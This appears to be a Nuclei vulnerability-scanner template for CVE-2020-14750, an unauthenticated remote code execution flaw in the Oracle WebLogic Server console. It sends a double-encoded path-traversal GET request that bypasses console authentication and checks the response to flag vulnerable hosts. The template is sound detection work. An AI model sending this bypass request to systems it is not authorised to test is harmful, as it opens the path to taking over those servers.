nuclei-templates/cves/2020/CVE-2020-14750.yaml

28 lines
955 B
YAML
Raw Normal View History

2021-04-23 12:39:54 +00:00
id: CVE-2020-14750
info:
name: Oracle WebLogic Server RCE
author: princechaddha
severity: high
description: |
This Security Alert addresses CVE-2020-14750, a remote code execution vulnerability in Oracle WebLogic Server.
This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update.
It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.
reference: https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
tags: cve,cve2020,rce,oracle,weblogic
requests:
- method: GET
path:
- "{{BaseURL}}/console/images/%252E./console.portal"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- "/console/console.portal"
- "/console/jsp/common/NoJMX.jsp"
part: body
condition: and